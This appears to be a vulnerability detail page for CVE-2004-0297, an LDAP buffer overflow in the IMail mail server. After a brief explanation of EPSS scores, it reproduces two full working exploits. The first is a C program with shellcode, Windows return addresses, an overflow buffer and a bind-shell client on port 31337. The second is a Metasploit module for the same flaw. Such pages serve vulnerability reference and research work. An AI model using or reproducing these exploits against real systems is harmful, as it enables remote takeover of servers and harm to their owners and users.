CVE-2004-0297 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/********************************************************/ /* THCimail 0.1 - Wind0wZ remote root exploit */ /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */ /* THC PUBLIC SOURCE MATERIALS */ /* */ /* Bug was found by idefense or some idefense slaves ;) */ /* http://www.idefense.com/application/poi/display?id=74&type=vuln */ /* */ /* compile with MS Visual C++ : cl THCimail.c */ /* */ /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, */ /* dvorak, scut, stealth, FtR and Random */ /********************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") char *WIN2KEN = "\xc4\x2a\x02\x75"; char *WIN2KPG = "\xc4\x2a\xf9\x74"; char *WINXPSP1G = "\xfe\x63\xa1\x71"; #define jumper "\xeb\x06\x4a\x43" char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20"; char shellcode[] = "\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02" "\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d" "\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8" "\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e" "\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb" "\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3" "\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04" "\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce" "\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f" "\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e" "\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38" "\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57" "\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2" "\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8" "\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41" "\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9" "\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43" "\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda" "\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea" "\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8" "\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07" "\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70" "\xda\x63\xe5\x70\x70\xda\x6f"; void usage(); void shell(int sock); int main(int argc, char *argv[]) { unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER; unsigned char *finalbuffer,*crapbuf1,*crapbuf2; unsigned int IMAIL6_7=60; unsigned int IMAIL_8=68; struct sockaddr_in mytcp; struct hostent * hp; WSADATA wsaData; printf("\nTHCimail v0.1 - Imail LDAP exploit\n"); printf("tested on Imail 6-8\n"); printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n"); if(argc<4 || argc>4) usage(); ver = (unsigned short)atoi(argv[3]); switch(ver) { case 0: IMAILVER = IMAIL6_7; break; case 1: IMAILVER = IMAIL_8; break; default: printf("\nYou entered an illegal version !\n\n"); usage(); exit(-1); } crapbuf1 = malloc(IMAILVER); memset(crapbuf1,'X',IMAILVER); printf("imailver = %d\n",IMAILVER); crapbuf2 = malloc(2220); memset(crapbuf2,'X',2220); finalbuffer = malloc(2650); memset(finalbuffer,0,2650); printf("\n[*] building buffer\n"); strcat(finalbuffer,ldapshit); strcat(finalbuffer,crapbuf1); strcat(finalbuffer,jumper); os = (unsigned short)atoi(argv[2]); switch(os) { case 0: strcat(finalbuffer,WIN2KPG); break; case 1: strcat(finalbuffer,WIN2KPG); break; case 2: strcat(finalbuffer,WINXPSP1G); break; default: printf("\nYou entered an illegal OS !\n\n"); usage(); exit(-1); } strcat(finalbuffer,shellcode); strcat(finalbuffer,crapbuf2); if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0) { printf("WSAStartup failed !\n"); exit(-1); } hp = gethostbyname(argv[1]); if (!hp){ addr = inet_addr(argv[1]); } if ((!hp) && (addr == INADDR_NONE) ) { printf("Unable to resolve %s\n",argv[1]); exit(-1); } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock) { printf("socket() error...\n"); exit(-1); } if (hp != NULL) memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length); else mytcp.sin_addr.s_addr = addr; if (hp) mytcp.sin_family = hp->h_addrtype; else mytcp.sin_family = AF_INET; mytcp.sin_port=htons(389); printf("[*] connecting the target\n"); rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in)); if(rc==0) { send(sock,finalbuffer,2650,0); printf("[*] Exploit send successfully ! Sleeping a while ....\n"); Sleep(1000); } else printf("\nCan't connect to ldap port!\n"); if(rc==0) { printf("[*] Trying to get a shell\n\n"); sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); mytcp.sin_port = htons(31337); rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp)); if(rc!=0) { printf("can't connect to port 31337 ;( maybe firewalled ...\n"); exit(-1); } shell(sock2); } shutdown(sock,1); closesocket(sock); free(crapbuf1); free(crapbuf2); free(finalbuffer); exit(0); } void usage() { unsigned int a; printf("\nUsage: <Host> <OS> <Imail Version>\n"); printf("Sample: THCimail 194.44.55.56 0 1\n\n"); printf("OS:\n"); printf("0 - Windows 2000 Server english all service packs\n"); printf("1 - Windows 2000 Professional german\n"); printf("2 - Windows XP SP1 german\n\n"); printf("Imail Version:\n"); printf("0 - Imail 6+7\n"); printf("1 - Imail 8\n"); exit(0); } void shell(int sock) { int l; char buf[1024]; struct timeval time; unsigned long ul[2]; time.tv_sec = 1; time.tv_usec = 0; while (1) { ul[0] = 1; ul[1] = sock; l = select (0, (fd_set *)&ul, NULL, NULL, &time); if(l == 1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("bye bye...\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("bye bye...\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("bye bye...\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("bye bye...\n"); return; } } } } // milw0rm.com [2004-02-27]

## # $Id: imail_thc.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'IMail LDAP Service Buffer Overflow', 'Description' => %q{ This exploits a buffer overflow in the LDAP service that is part of the IMail product. This module was tested against version 7.10 and 8.5, both running on Windows 2000. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2004-0297'], [ 'OSVDB', '3984'], [ 'BID', '9682'], [ 'URL', 'http://secunia.com/advisories/10880/'], ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d\x20", }, 'Platform' => 'win', 'Targets' => [ ["Windows 2000 English", { 'Ret' => 0x75023386 }], ["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }], ], 'DisclosureDate' => 'Feb 17 2004', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(389) ], self.class) end def exploit connect buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20" buf << "\xcc" * 5000 # Universal exploit, targets 6.x, 7.x, and 8.x at once ;) # Thanks for johnny cyberpunk for 6/7 vs 8 diffs buf[77, 4] = "\xeb\x06" buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x buf[85, 4] = "\xeb\x06" buf[89, 4] = [target.ret].pack('V') # 8.x buf[93, payload.encoded.length] = payload.encoded sock.put(buf) handler disconnect end end